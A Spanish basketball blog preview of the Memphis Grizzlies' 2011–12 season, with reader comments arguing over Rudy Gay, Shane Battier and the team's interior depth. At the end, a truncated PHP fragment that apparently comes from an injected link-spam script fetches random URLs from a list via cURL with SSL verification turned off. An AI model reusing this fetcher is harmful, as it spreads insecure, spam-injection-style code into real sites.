Memphis Grizzles: El abrazo del oso

22 de December de 2011 por TheDeerHunter

Venimos de una temporada brillante, sin duda la mejor temporada de la historia de la franquicia. Sin embargo, del sueño y la euforia del 7º partido por una final de conferencia los Grizzlies pasaron, al caer eliminados, a la realidad de la casa tradicionalmente humilde.

En buena lógica, el planteamiento no ha sido “a ver qué agente libre estelar nos traemos” sinó consolidar lo que les llevó el año pasado a las mayores cotas que hayan conocido. Y no era objetivo baladí. Los principales “fichajes” para cumplir los objetivos del próximo curso (que no serán inferiores a los logros del curso pasado) son Rudy Gay y Marc Gasol, añadidos a la ya conocida continuidad de Zach Randolph. El abrazo del oso ha servido, al menos, para mantener a sus crías. No es moco de pavo y la apuesta es alta, pero no quita que la tarea de consolidarse entre las 4 mayores potencias del Oeste, viendo como se han movido otros, continúa siendo como mínimo difícil. Más aún ante las últimas noticias: Darrell Arthur puede perderse toda la campaña por una grave lesión en el tendón de Aquiles. El juego interior ahora mismo está formado por Marc, Randolph y Brian Skinner, quién no sabemos si está para grandes batallas. La pareja Randolph-Marc es una de las mejor conjuntadas de toda la liga y son su principal baza, pero con 66 partidos en 120 días necesitarán ayuda. Puede ser la oportunidad definitiva de Haddadi, quien ahora mismo se encuentra tramitando su regreso a la liga desde Irán.

La suma de Rudy Gay a la escuadra que machacó a los Spurs en abril debería de ser motivo de optimismo. Sin embargo la mejora colectiva no parece ser directamente proporcional a su talento. En este caso tenemos dudas de si 1+1=2. Su personalidad excesivamente individualista provoca escepticismo sobre el salto cualitativo que en la práctica tendrá lugar.

Y es que la batería de perros de presa que desplegó Hollins el curso pasado (en la que no estaba Gay) fue uno de los principales argumentos para dejar de ser “los osos amorosos”. Tony Allen y Sam Young siguen ahí y, más o menos, conocemos lo que pueden dar. Sin embargo, han perdido la significativa aportación de Battier y, por lo que se vislumbra, no queda mucha confianza en lo que se refiere a O.J. Mayo. Una lástima porque el jugador puede ofrecer muchas cosas, como ya pudimos constatar en la última postemporada. Quede como quede esa cuestión deberían tratar de

encontrar utilidad a Xavier Henry, escolta de segundo con, en teoría, muchas virtudes porque en su año de novato le vimos poco.

También en la teoría la posición de base parece estar cubierta. Michael Conley al nivel del mejor año de su vida, como fue el curso pasado, es un buen elemento aunque en playoffs decepcionara un poco. En cambio a Greivis Vasquez le sucedió al contrario y en el momento decisivo demostró que puede resultar aprovechable. Josh Selby y Jemery Pargo disfrutarán de pocas oportunidades.

Creo que planificación es correcta y los Grizzlies, por una vez, han hecho todo lo que está en su mano para consolidar el mejor proyecto que han montado hasta la fecha. De la aportación de Gay, la progresión de Marc o Vasquez, la regularidad de Conley o incluso la recuperación total para la causa de OJ Mayo dependería contemplar objetivos más elevados. Sin embargo, la precariedad de su juego interior y el aumento de nivel de otros rivales en el Oeste van a complicar incluso repetir los resultados de la pasada campaña. En mi opinión una segunda ronda volvería a ser un éxito.

Quinteto: Michael Conley, Tony Allen, Rudy Gay, Zach Randolph, Marc Gasol
6º hombre: OJ Mayo/ Sam Young

Pronóstico: Primera ronda.

Comenta

31 comentarios a esta entrada

  1. Ru dice:
    #1

    Yo me encuentro con las mismas sensaciones respecto a los Grizzlies.Creo que nos olvidamos de dónde vienen,mucho han hecho que han conseguido mantener a todo el plantel borrando la etiqueta de “franquicia perdedora” con la brillante temporada pasada.Está claro que esta temporada va a depender de la adaptación de Rudy Gay al eje Randolph-Marc.Yo apuesto que saldrá bastante bien y que el paso de los años y la exitosa temporada pasada han conseguido “amansar” a Gay para ser menos individualista.De todas formas,si resulta que se viene abajo la química del equipo Gay es una pieza codiciadísima en muchos equipos,lo mismo que OJ Mayo,que creo que con el rol de 6º hombre puede consolidarse como un gran jugador,pero más pronto que tarde lo veo fuera de Memphis.

    Han retenido a Marc,ni Randolph,ni Gay han pedido salir,mantienen el bloque…y eso es muy positivo.Yo apuesto a que repiten PO,igual con un mejor balance en la RS por el envejecimiento del oeste,pero no creo que en postemporada repitan su actuación.

      Citar

  2. GreenPride dice:
    #2

    Un equipo en progresión al que a lo mejor se va a pedir demasiado por el recuerdo de sus playoffs del año pasado. Pierden dos piezas que fueron muy importantes el año pasado como Shane Battier y Darrel Arthur así que otros tendrán que subir su nivel para llenar esos huecos. En teoría, Gay sano debería dar más que Battier pero yo también tengo dudas de si en conjunto el equipo será mejor con Gay de lo que lo era con Battier. Por dentro necesitan un paso adelante de Hadadi y aún así tendrían que conseguir algún refuerzo interior que les permita dar descanso a Marc&Zach que para mí son la base y la clave de este equipo. Año importantísimo para la franquicia. Si Marc, OJ, Gay, Vasquez, Conley siguen su progresión pueden ser un equipo durísimo, si no se quedarán en poca cosa. Para mí equipo de Playoffs y sí que pueden pasar la primera ronda. Llegar a las finales de conferencia lo veo muy difícil

      Citar

  3. portu dice:
    #3

    Entiendo q se pueda dudar de qué equipo es mejor con o sin Gay, a mi esa misma duda me asalta con muchos nombres: D. Granger en los Pacers, Kobe en los Lakers, Wade antiguamente en Miami, Carmelo,… son jugadores exteriores q se lo juegan todo o casi todo, no involucran demasiado a sus compañeros en ataque, fuerzan tiros, asumen mucho dominio de la bola… realmente dudo muchas veces de este estilo NBA, pero está tan extendido que entiendo q allí tiene mucho valor. Al final supongo q todo depende del acierto del jugador en cuestión y de que no sobrepase una línea límite en cuanto a su protagonismo como para cargarse la química del equipo. Como arma ofensiva Gay es de lo mejorcito de la liga y en defensa no desentona demasiado (hay otros mucho más pasotas), creo q los Grizzlies son un equipo compensado en cuanto a roles y necesitan a un jugador como Gay q sea una amenaza exterior importante, todo no puede recaer en Zach y los demás no suelen crearse sus propios tiros.

      Citar

  4. Sancho88 dice:
    #4

    Como comentáis, parece que no tienen recambios fiables en la zona, y realmente la baja de Arthur les va a pesar ahí. Sobre Battier, fue el pegamento la temporada pasada, y por eso el equipo llegó donde llegó. Sin él mucho me temo que volveremos a ver idas de olla de esas míticas en memphis, que pueden ir ganando de 10 faltando 3 minutos y tirar el partido perfectamente. De todas formas, espero que se consolide el estilo del año pasado, mucho más inteligente y sabiendo leer los partidos. Yo creo que este equipo se merece una oportunidad de pelear en el oeste. Pueden repetir segunda ronda

      Citar

  5. Txusma dice:
    #5

    Pues para mi el auténtico termómetro de este equipo es Tony Allen. No dudo de la calidad de Randolph, Gay y Gasol pero la defensa e intensidad de Tony Allen son capaces de contagiar a cualquiera. Su actuación del año pasado tb es digna de destacar. Creo que puede suplir sin problema el hueco que deja Battier en ese aspecto.

      Citar

  6. Cocinitas dice:
    #6

    No se a mi se me antoja complicado suplir la baja de Arthur. Si no fichan un interior de garantias pueden perder la temporada, una lesión de Marc o Randolph seria fatal, pudiendo costarles incluso los Playoffs. Queda poco pescado por vender en el mercado de agentes libres, yo tantearia a Kenyon Martin si vuelve de China, pero veo complicado que quiera ir a una ciudad como Memphis. A mi Haddadi no me convence nada. A mi todavia me rechina el pick 2 del draft que desaprovecharon con Thabeet, una pena porque pordrian tener un equipazo con Evans, Curry o Hansbrough.

      Citar

  7. Ru dice:
    #7

    Al parecer aunque el bueno de Kenyon haya dejado el equipo en China no puede volver a jugar en la NBA hasta que su equipo chino no finalice su temporada,así que aunque sería el prototipo de fichaje que deberían hacer,es 99.9% improbable -a no ser que la NBA alcance algún acuerdo de última hora con los chinos,que vete a tu a saber-.

      Citar

  8. Nacho dice:
    #8

    Parece que han hecho una oferta por Dante Cuninghan, veremos si Charlotte la iguala.
    Por otro lado no nos podemos poner en “si se lesionan Marc o Zach…” porque eso sería extensible a todos los equipos, ¿qué sería de MIami si se lesionan Wade o LeBron?
    Para mí la duda de los osos es que ya son un equipo a batir, y veremos si eso lo asimilan bien. Si lo hacen, y con un poco de suerte, 2ª ronda garantizada, y de ahí, soñar es gratis.

      Citar

  9. RSB dice:
    #9

    Yo los veía finalistas de la NBA este año. Muchos pensaréis que se me ha ido la mano con algún estupefaciente, pero me parecen un señor equipo. Nadie da un duro por ellos, algo curioso cuando el año pasado se ventilaron tranquilamente al mejor equipo de oeste en la RS. Y en la siguiente ronda casi tumban a los Thunder, un equipo que todo el mundo da como claro aspirante, sin uno de sus mejores jugador como es Gay.

    Y digo veía porque se les ha roto su único interior válido para rotación, ahondando en el único defecto de su roster que era la falta de un cuarto interior de relevo. Ahora faltan dos, y eso es muy preocupante.

    Aún así los veo entre los 4 mejores del oeste, y eso ya es decir mucho. Confio en que hagan un muy buen año

      Citar

  10. Esteban dice:
    #10

    creo que la duda esta puesta en zach, volvera a ser el all star que fue en los ultimos PO? si bien en po fueron un equipo donde todos aportaron, los partidos y las series las gano zach, metiendo todos los puntos importantes de su equipo, jugando al nivel de un duncan en sus mejores años, sencillamente imparable
    si zach repite un rendimiento asi, menphis no tiene techo, habra q ver si su personalidad, su nuevo contrato y compartir protagonismo con gay le permite repetir

    si gay se toma el puesto de alero tirador, el equipo dara un salto, pero si se cree que es una estrella y toma mas iniciativas de las que debe, puede afectar el rendimiento del equipo

    mayo aun es un jugador muy util, hollins lo sabe y le va a sacar el jugo

    marc, es uno de los mejores pivotes

    digamos que su piso esta en semifinales de cofnerecia, y si randhoplh repite sus epicos play offs (jugo al nivel de nowistki y de lebron hasta las finales) pueden terminar quien sabe donde

      Citar

  11. Esteban dice:
    #11

    Txusma:
    Pues para mi el auténtico termómetro de este equipo es Tony Allen. No dudo de la calidad de Randolph, Gay y Gasol pero la defensa e intensidad de Tony Allen son capaces de contagiar a cualquiera. Su actuación del año pasado tb es digna de destacar. Creo que puede suplir sin problema el hueco que deja Battier en ese aspecto.

    no entiendo por que tanto alboroto por el hueco que deja battier en el equipo, lo unico bueno que hizo el año pasado fue su triple contra los spurs en el primer `partido, luego no promedio ni dos puntos ni un rebote y erro todo lo que tiro, A VER MUCHACHOS, LA BAJA DE BATTIER SE REEMPLAZA CON RUDY GAY… Y CREEN QUE SALIERON PERDIENDO?

    EL PERIMETRO DEL AÑO PASADO DURANTE LOS PO ERAN, ALLEN-YOUNG Y SALTABAN DE LA BANCA MAYO-BATTIER, ESTE AÑO EL PERIMETRO TITULAR SERA ALLEN-GAY Y SALTARAN MAYO-YOUNG, no entiendo la preocùapcion, para mi salen ganando sin dudas

      Citar

  12. Pop dice:
    #12

    Es que Battier es uno de los jugadores con mejores intangibles de la NBA, sobre todo en defensa. Importa un comino que no promedia no sé cuantos puntos y rebotes. Me recuerda mucho a Carlos Jiménez.

      Citar

  13. TheDeerHunter dice:
    #13

    @Esteban, POR PONER EN MAYÚSCULAS NO CREAS QUE TENGAS MÁS RAZÓN!!!
    Te explico un poquito… el año pasado hasta la lesión de Gay los Grizzlies venían peleando con ciertas dificultades el 50% de victorias y la clasificación para playoffs. Después ganan 19 partidos de regular y pierden 11, clasificando sobrados. Y posteriormente le dan una paliza a los campeones de la regular y pierden en 7 contra los Thunder.
    ¿qué crees tú que dicen los hechos? ¿jugaron mejor los Grizzlies con Gay o sin Gay? Yo diría que es claro y diáfano…y eso que simplemente indico los resultados, porque en nivel de juego la diferencia aún fue más grande.
    Para mí es un hecho demostrado hasta la fecha que la mejora que debería de venir asociada al gran talento de Gay (que nadie se lo discute) en la práctica no es tal. Creo que buena culpa la tiene el propio Gay y debería de hacérselo mirar. Luego puedes entrar en milongas de si Gay es mejor que Battier (que eso no lo ha cuestionado nadie) pero Battier por dónde ha pasado ha sumado siempre, entre otras cosas porque es uno de los mejores defensores de perímetro que hay en toda la liga… pero eso los números no lo reflejan.

      Citar

  14. Sancho88 dice:
    #14

    Esteban tío, nunca me parece que tengas razón en los comentarios. Creo que ves cosas que el resto no vemos, como con Minesotta. En fin, tú sabrás. Comparando a Barea con Ricky, y diciendo que Ridnour es mejor…

      Citar

  15. portu dice:
    #15

    Pues yo estoy con Txus, ví más importante el papel de T. Allen en los playoffs pasados q el de Battier. El juego exterior es de lo mejorcito de la liga, sobretodo hablando de los 4 tíos de la rotación. Lástima de los suplentes interiores… vamos de la falta de ellos…

      Citar

  16. Esteban dice:
    #16

    Sancho88:
    Esteban tío, nunca me parece que tengas razón en los comentarios. Creo que ves cosas que el resto no vemos, como con Minesotta. En fin, tú sabrás. Comparando a Barea con Ricky, y diciendo que Ridnour es mejor…

    SANCHO88 la verdad no lei casi comentarios tuyos asi que no puedo decir que coincida o no, pero gracias por leerme tu a mi

    al resto, ya que a mi no me dan credito, dejo que John Hollinger, les explique que paso el año pasado con menphis, espero que a el si lo entiendan:

    8. Memphis Grizzlies (37-29)

    Entonces, tratemos la tonta idea de que de algún modo Rudy Gay es malo para la química de los Grizzlies, una noción que cobró intensidad cuando Memphis llegó a la segunda ronda de la postemporada sin él. Los Griz tuvieron un inicio lento con Gay, pero mucho de eso se debió a las horribles elecciones personales que no tuvieron nada que ver con Gay. Ellos tenían como titular a Xavier Henry, Acie Law era el base suplente, y Tony Allen casi no jugaba.

    ¿Saben cuántas veces Allen y Gay jugaron al menos 25 minutos? Siete. Los Griz ganaron seis de esos juegos, con un margen promedio de +7.7. El problema no era de Gay, el problema era que para casi todo el tiempo que Gay estaba en buena salud, los Grizzlies no ponían a jugar a Tony Allen.

    Ambos serán titulares esta temporada, dándole a Memphis uno de los mejores quintetos titulares de todo el básquet. Oh sorpresa, la banca es otro tema diferente. Hace un par de días tuve a los Grizzlies en el cuarto puesto, y yo creí que tenían una oportunidad de hacer grandes cosas en los playoffs si permanecían sanos. El hecho de que ahora los tenga en octavo puesto refleja dos cosas: (1) Perder a Darrell Arthur por toda la temporada es un golpe duro y (2) los contendientes están bien apretados. Para los contendientes del Oeste, cada juego va a importar.

    Incluso con Arthur, los Grizzlies ya tenían poca profundidad, especialmente en la cancha delantera donde, por el momento, Hamed Haddadi está dibujado como el primer hombre grande fuera del banco. (Por cierto, he cotizado una firma o comercio para obtener a otro hombre grande en esta predicción, pero él no estará al nivel de Arthur). Cualquier lesión a Marc Gasol o al armador Mike Conley derribará a estos muchachos a los costados por un tiempo, especialmente desde que están duros contra la línea de impuesto de lujo y tienen poca flexibilidad para sumar jugadores en el camino.

    sancho88 viste las series de Menphis o solo sabes como terminaron? caray no puedo creer que creas que battier tuvo algo que ver en esas vistorias cuado casi ni jugaba, y el sexto hombre del equipo era Mayo, y hasta los 30 segundos de final de cuatro que jugaba Vazquez eran mas productivos, ni hablar de los tiros de 4 y 5 metros de arthur, en fin, ve la serie y luego hablamos

      Citar

  17. HisRoyalAirness dice:
    #17

    TheDeerHunter:
    @Esteban, POR PONER EN MAYÚSCULAS NO CREAS QUE TENGAS MÁS RAZÓN!!!
    Te explico un poquito… el año pasado hasta la lesión de Gay los Grizzlies venían peleando con ciertas dificultades el 50% de victorias y la clasificación para playoffs. Después ganan 19 partidos de regular y pierden 11, clasificando sobrados. Y posteriormente le dan una paliza a los campeones de la regular y pierden en 7 contra los Thunder.
    ¿qué crees tú que dicen los hechos? ¿jugaron mejor los Grizzlies con Gay o sin Gay? Yo diría que es claro y diáfano…y eso que simplemente indico los resultados, porque en nivel de juego la diferencia aún fue más grande.
    Para mí es un hecho demostrado hasta la fecha que la mejora que debería de venir asociada al gran talento de Gay (que nadie se lo discute) en la práctica no es tal. Creo que buena culpa la tiene el propio Gay y debería de hacérselo mirar. Luego puedes entrar en milongas de si Gay es mejor que Battier (que eso no lo ha cuestionado nadie) pero Battier por dónde ha pasado ha sumado siempre, entre otras cosas porque es uno de los mejores defensores de perímetro que hay en toda la liga… pero eso los números no lo reflejan.

    No hase falta disir más

      Citar

  18. HisRoyalAirness dice:
    #18

    Esteban: SANCHO88 la verdad no lei casi comentarios tuyos asi que no puedo decir que coincida o no, pero gracias por leerme tu a mi

    al resto, ya que a mi no me dan credito, dejo que John Hollinger, les explique que paso el año pasado con menphis, espero que a el si lo entiendan:

    8. Memphis Grizzlies (37-29)

    Entonces, tratemos la tonta idea de que de algún modo Rudy Gay es malo para la química de los Grizzlies, una noción que cobró intensidad cuando Memphis llegó a la segunda ronda de la postemporada sin él. Los Griz tuvieron un inicio lento con Gay, pero mucho de eso se debió a las horribles elecciones personales que no tuvieron nada que ver con Gay. Ellos tenían como titular a Xavier Henry, Acie Law era el base suplente, y Tony Allen casi no jugaba.

    ¿Saben cuántas veces Allen y Gay jugaron al menos 25 minutos? Siete. Los Griz ganaron seis de esos juegos, con un margen promedio de +7.7. El problema no era de Gay, el problema era que para casi todo el tiempo que Gay estaba en buena salud, los Grizzlies no ponían a jugar a Tony Allen.

    Ambos serán titulares esta temporada, dándole a Memphis uno de los mejores quintetos titulares de todo el básquet. Oh sorpresa, la banca es otro tema diferente. Hace un par de días tuve a los Grizzlies en el cuarto puesto, y yo creí que tenían una oportunidad de hacer grandes cosas en los playoffs si permanecían sanos. El hecho de que ahora los tenga en octavo puesto refleja dos cosas: (1) Perder a Darrell Arthur por toda la temporada es un golpe duro y (2) los contendientes están bien apretados. Para los contendientes del Oeste, cada juego va a importar.

    Incluso con Arthur, los Grizzlies ya tenían poca profundidad, especialmente en la cancha delantera donde, por el momento, Hamed Haddadi está dibujado como el primer hombre grande fuera del banco. (Por cierto, he cotizado una firma o comercio para obtener a otro hombre grande en esta predicción, pero él no estará al nivel de Arthur). Cualquier lesión a Marc Gasol o al armador Mike Conley derribará a estos muchachos a los costados por un tiempo, especialmente desde que están duros contra la línea de impuesto de lujo y tienen poca flexibilidad para sumar jugadores en el camino.

    sancho88 viste las series de Menphis o solo sabes como terminaron? caray no puedo creer que creas que battier tuvo algo que ver en esas vistorias cuado casi ni jugaba, y el sexto hombre del equipo era Mayo, y hasta los 30 segundos de final de cuatro que jugaba Vazquez eran mas productivos, ni hablar de los tiros de 4 y 5 metros de arthur, en fin, ve la serie y luego hablamos

    @Esteban si quieres leer a Sancho puedes mirar, por ejemplo, el análisis de los Sacramento Kings porque es suyo. Y es cojonudo, añado

    Podemos discutir sobre quién tuvo mejor papel en PO, si Battier o Allen como dicen Txus y Portu; eso evidentemente es debatible.
    Personalmente creo que Battier da al equipo unos intangibles en forma de motivación, concentración e implicación que dan pocos defensores de perímetro. Tiene una gran experiencia y los jóvenes aprenden mucho con él. Y en ataque, además, no resta.

      Citar

  19. Esteban dice:
    #19

    ok pido disuclpas por mi insolencia, nunca de mi parte he desacreditado comentarios de otro si han hecho conmigo, soy inexperto y no tengo nombre en esta pagina, pero no quiere decir que los que si lo tienen tengan mas razon

    HisRoyalAirness, entiendo lo de los super intangibles, o sea cosas que sucedan en el vestuario que nosotros no vemos, pero dentro de la cancha, los que hayan visto las series de PO de memphis, estoy seguro que coincidiran que el papel que tenia battier, era como minimo secundario, no tengo la estadistica aqui, pero incluso sus minutos eran reducidos, y tengo idea que sus porcentajes de campo fueron de los peores de los PO, con permiso de jefferson

    sancho88, perdon por la mala educacion

      Citar

  20. HisRoyalAirness dice:
    #20

    Esteban:
    ok pido disuclpas por mi insolencia, nunca de mi parte he desacreditado comentarios de otro si hanhecho conmigo, soy inexperto y no tengo nombre en esta pagina, pero no quiere decir que los que si lo tienen tengan mas razon

    HisRoyalAirness, entiendo lo de los super intangibles, o sea cosas que sucedan en el vestuario que nosotros no vemos, pero dentro de la cancha, los que hayan visto las series de PO de memphis, estoy seguro que coincidiran que el papel que tenia battier, era como minimo secundario, no tengo la estadistica aqui, pero incluso sus minutos eran reducidos, y tengo idea que sus porcentajes de campo fueron de los peores de los PO, con permiso de jefferson

    sancho88, perdon por la mala educacion

    A ver una cosa, lo de “no tengo nombre” me parece una estupidez porque si por algo se distingue la gente que pasa por aquí a diario es por respetar las opiniones de todo el mundo. Yo, sin ir màs lejos, no soy de los que más tiempo lleva posteando ni de lejos y siempre se me ha tratado como uno más. Creo que todos venimos a debatir y aunque no estemos unos de acuerdo con los otros no pasa nada.

    Con respecto a lo otro, sí que vi las series de los Grizzlies es más, vi todos los partidos de PO salvo algunos de la primera ronda de Bulls, no voy a rebatirte sin saber. Cuando hablo de intangibles no hablo solo del vestuario sino de la pista y del tiempo de juego. La agresividad por ejemplo. No es una casualidad que este año se lo rifaran todos los equipos aspirantes

      Citar

  21. melo15 dice:
    #21

    Oye no pasa nada, yo creo que todos teneis un poco de razon para mi battier es muy buen jugador y muy buen defensor pero tambien creo que gay es un pedazo de jugador que si deja de ser tan egoista podria ser muy grande

      Citar

  22. esteban dice:
    #22

    Esta bien, se lo rifaron porq firmo por 3 millones, apenas mas que el minimo de veterano, para ser suplente en su equipo, tal como lo era el año pasado

    Ya esta, el tema aqui no es q tan bueno es battier sino q tan diferente para peor pueden ser los memphis perder a battier por gay

    Para mi ganan, para otros pierde… Creo que el analisis de hollinger refleja mi opinion

      Citar

  23. Tobal dice:
    #23

    Estos Grizzlies tienen buena pinta,tienen un quinteto titular,bastante bueno,quizás les falte más rotación interior,pero como la pareja Marc Gasol – Zach Randolph,muestren esa regularidad como la temporada anterior,pueden dar más de una sorpresa,espero que Rudy Gay demuestre todo el talento que tiene y juegue más en equipo,si eso pasa los Grizzlies lo agradecerán.Para mí,otro de los aspectos a destacar,es saber si el pabellon de los Grizzlies,se llenará más esta temporada,en los pasados play offs daba gusto ver el graderío de ese bonito pabellón lleno de gente,hace mucho tiempo que no se veía así,con la gran campaña que hicieron,sería una pena que el público no apoye al equipo en este año.

      Citar

  24. melo15 dice:
    #24

    Si para los grizzlies es mejor gay o battier lo sabremos muy pronto

      Citar

  25. Vader dice:
    #25

    Vasquez a NOH por Pondexter, el vacio interior ya no es tanto. Una pena tenirse que desprender de Vasquez pero algo tenian que hacer.

    Saludos

      Citar

  26. melo15 dice:
    #26

    Pondexter es alero

      Citar

  27. Vader dice:
    #27

    melo15:
    Pondexter es alero

    Cierto, pues de memória pensaba que jugaba de 4… Pues ahora ya no entiendo tanto el movimiento. Tienen a Gay, Young y fichan a este? Lo que les hace falta son 4 y/o 5!!

    Saludos

      Citar

  28. Ru dice:
    #28

    Se han hecho con los derechos de Cunningham -no igualó Bobcats- ,así que éste es la rotación interior.

      Citar

  29. Jose Luis dice:
    #29

    Pues a mi Vasquez me gustaba mucho para jugar de 2º base. No sé si buscan darle más minutos a Mayo o qué, pero creo que Pondexter jugará muy muy poco

      Citar

  30. melo15 dice:
    #30

    Yo no acabo dew entender que pasa con mayo, cuando quiere es un pedazo de jugador, y lo demostro en su temporada rookie, yo creo que los grizzlies estan frenando su progresion, y sobre pondexter no se para que lo han fichado,
    Alguien me puede explicar porfavor cuanto les dura el contrato a los rookies

      Citar

  31. Jose Luis dice:
    #31

    ¿Alguien sabe cuando vuelve Hamed Haddadi a jugar? No me explico porqué no juega, no creo que sea por problemas con el entrenador, ya que el año pasado sí que jugó y para lo que está haciendo Speights… ¿alguien sabe algo?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>